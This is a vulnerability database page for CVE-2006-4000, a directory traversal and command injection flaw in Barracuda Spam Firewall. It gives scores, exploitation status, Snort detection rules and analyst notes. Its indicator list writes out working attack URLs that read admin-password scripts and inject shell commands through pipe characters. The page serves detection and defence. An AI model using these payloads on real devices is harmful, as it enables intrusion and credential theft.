cbcvebase.
CVE-2006-4000
published 2006-08-05

CVE-2006-4000: Directory traversal vulnerability in cgi-bin/preview_email.cgi in Barracuda Spam Firewall (BSF) 3.3.01.001 through 3.3.03.053 allows remote authenticated users…

PriorityP266medium4CVSS 2.0
AVNACLAuSCPINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
5.58%
91.9th percentile
Directory traversal vulnerability in cgi-bin/preview_email.cgi in Barracuda Spam Firewall (BSF) 3.3.01.001 through 3.3.03.053 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.

Affected

3 ranges
VendorProductVersion rangeFixed in
barracuda_networksbarracuda_spam_firewall
barracuda_networksbarracuda_spam_firewall
barracuda_networksbarracuda_spam_firewall

Detection & IOCsextracted from sources · hover to see the quote

urlhttps:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
urlhttps:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
urlhttps:///cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|
urlhttps:///cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
urlhttps:///cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
path/cgi-bin/preview_email.cgi
path/mail/mlog/../tmp/backup/periodic_config.txt.tmp
path/mail/mlog/../bin/update_admin_passwd.pl
snort
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Barracuda Spam Firewall 3.3.x RCE 2006-4000 (Outbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/preview_email.cgi?file=/mail/mlog/|7c|"; startswith; fast_pattern; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2006-4000; classtype:attempted-admin; sid:2029172; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2006_4000, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
snort
alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Barracuda Spam Firewall 3.3.x RCE 2006-4000 (Inbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/preview_email.cgi?file=/mail/mlog/|7c|"; startswith; fast_pattern; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2006-4000; classtype:attempted-admin; sid:2029173; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2006_4000, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
bytes
/cgi-bin/preview_email.cgi?file=/mail/mlog/|7c|
  • Exploit traffic uses HTTP GET to /cgi-bin/preview_email.cgi with a 'file' parameter containing pipe characters (URL-encoded as %7c or literal |) to inject shell commands — match on URI pattern /cgi-bin/preview_email.cgi?file=/mail/mlog/ followed by pipe-delimited command injection.
  • Directory traversal attempts use '../' sequences in the 'file' parameter to escape /mail/mlog and reach sensitive files such as update_admin_passwd.pl or periodic_config.txt.tmp.
  • Command injection uses the Unix pipe metacharacter '|' (also encoded as %7c) surrounding commands (e.g., |uname%20-a|) in the file parameter of preview_email.cgi.
  • Attackers may attempt to read /mail/mlog/../bin/update_admin_passwd.pl to extract admin credentials from the Barracuda device.
  • Several web directories are accessible without authentication and may be probed during reconnaissance: /Translators/, /images/, /locale, /plugins, /help.
  • This vulnerability has been exploited by the Mirai variant EchoBot botnet; correlate CVE-2006-4000 exploitation attempts with known Mirai/EchoBot C2 infrastructure.
  • ·The ET Snort rules (sid:2029172 / sid:2029173) use |7c| (hex for '|') as the pipe-character match in the URI; ensure your IDS/IPS hex content matching is enabled for accurate detection.
  • ·The exploit requires a second 'http' string to appear after the pipe-injected command in the URI (distance:0 match on 'http'); this reflects the attacker embedding a callback URL as the injected command payload.

CVSS provenance

nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:P/I:N/A:N
vulncheck4.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.